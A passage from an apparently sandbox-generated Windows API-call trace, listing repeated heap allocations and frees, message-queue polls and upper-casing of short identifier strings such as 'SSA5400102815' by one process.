lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0196.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.581] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.581] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.582] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.582] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.582] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.582] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.583] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.583] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.584] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.584] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.585] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.585] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.586] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.586] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.586] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.587] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.587] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.588] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 